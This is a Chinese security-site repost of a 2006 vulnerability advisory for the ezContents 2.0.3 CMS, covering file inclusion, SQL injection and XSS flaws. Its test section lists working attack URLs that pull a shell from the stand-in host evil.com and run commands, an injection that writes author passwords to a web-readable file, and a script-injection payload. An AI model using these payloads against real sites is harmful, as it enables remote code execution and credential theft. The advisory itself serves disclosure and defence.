ezContents多个SQL注入、远程/本地文件包含和跨站脚本漏洞

首页	安全动态	IT新闻	安全人物	本站动态	漏洞公告	病毒警报	木马预警
流氓软件	漏洞分析	入侵检测	升级补丁	安全配置	信道安全	设备安全	协议安全
WEB安全	病毒分析	木马研究	脚本注入	后门探讨	技术应用	数据安全	企业专区

收藏本站

设为首页



	会员登录：

站内搜索：新闻中心系统安全网络安全安全技术下载中心

ezContents多个SQL注入、远程/本地文件包含和跨站脚本漏洞

作者：佚名文章来源：不详点击数：更新时间：2007-1-26 14:58:12

2006-9-1

发布日期：2006-08-31
更新日期：2006-09-01

受影响系统：

VisualShapers ezContents 2.0.3

描述：

BUGTRAQ  ID: 19780,19777,19776

ezContents是一款开放源代码内容管理系统。

ezContents中存在多个输入验证错误，具体如下：

1) modules/moduleSec.php文件的moduleExternalLink()函数中的漏洞允许攻击者使用ftps协议包含本地或外部资源的任意文件。include/functions.php文件中的isExternalLink()函数和admin/adminbutton.php中的adminExternalLink()函数也存在同样问题。

2) 没有正确的过滤headeruserdata.php文件中的groupname参数输入，允许攻击者通过注入任意SQL代码控制SQL查询。

3) 没有正确的过滤loginreg2.php文件中对subgroupname参数的输入，允许攻击者在用户浏览器会话中执行任意HTML和脚本代码。

<*来源：DarkFig （gmdarkfig@gmail.com）

  链接：http://archives.neohapsis.com/archives/bugtraq/2002-07/0292.html
*>

测试方法：

警告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

远程/本地文件包含
=================================
http://[...]/modules/diary/event_list.php?GLOBALS[rootdp]=&GLOBALS[admin_home]=ftps://evil.com/sh.php&cmd=ls
http://[...]/modules/calendar/calendar.php?GLOBALS[rootdp]=&GLOBALS[language_home]=ftps://evil.com/sh.php&cmd=ls
http://[...]/modules/gallery/gallery_summary.php?GLOBALS[rootdp]=&GLOBALS[admin_home]=ftps://evil.com/sh.php&cmd=ls
http://[...]/modules/guestbook/showguestbook.php?GLOBALS[rootdp]=&GLOBALS[admin_home]=ftps://evil.com/sh.php&cmd=ls
http://[...]/modules/links/showlinks.php?GLOBALS[rootdp]=&GLOBALS[admin_home]=ftps://evil.com/sh.php&cmd=ls
http://[...]/modules/news/shownews.php?GLOBALS[rootdp]=&GLOBALS[language_home]=ftps://evil.com/sh.php&cmd=ls
http://[...]/modules/poll/showpoll.php?GLOBALS[rootdp]=&GLOBALS[language_home]=ftps://evil.com/sh.php&cmd=ls
http://[...]/modules/reviews/review_summary.php?GLOBALS[rootdp]=&GLOBALS[admin_home]=ftps://evil.com/sh.php&cmd=ls
http://[...]/modules/search/search.php?GLOBALS[rootdp]=&GLOBALS[language_home]=ftps://evil.com/sh.php&cmd=ls
http://[...]/modules/toprated/toprated.php?GLOBALS[rootdp]=&GLOBALS[language_home]=ftps://evil.com/sh.php&cmd=ls
http://[...]/modules/whatsnew/whatsnew.php?GLOBALS[rootdp]=&GLOBALS[language_home]=ftps://evil.com/sh.php&cmd=ls

SQL注入
=================
http://[...]/headeruserdata.php?groupname=' UNION SELECT userpassword FROM authors INTO OUTFILE '/www/passwd.txt' #

跨站脚本
========================
http://[...]/loginreq2.php?subgroupname="><script>alert(666)</script>

建议：

厂商补丁：

VisualShapers
-------------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.visualshapers.com/

文章录入：admin 责任编辑：admin

上一篇文章： UBBThreads多个文件包含和跨站脚本漏洞

下一篇文章： PmWiki表格标记脚本注入漏洞

【字体：小大】【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口】

　网友评论：（只显示最新10条。评论内容只代表网友观点，与本站立场无关！）

ColdFusion MX7多个信息
Ipswitch IMail Server/
Symantec On-Demand Pro
Downcool收集最新注册码
ipconfig工具图形界面脚
让你知道codepage的重要
破解Session cookie的方
数据恢复全能将军:Searc
Unicode简介
谈谈Unicode编码，简要解

\| 设为首页 \| 加入收藏 \| 联系站长 \| 友情链接 \| 版权申明 \|
站长邮箱：webmaster@anquan365.com 联系电话：86-10-67634029 Copyright © 2006-2008　www.anquan365.com　北京华安普特网络科技有限公司版权所有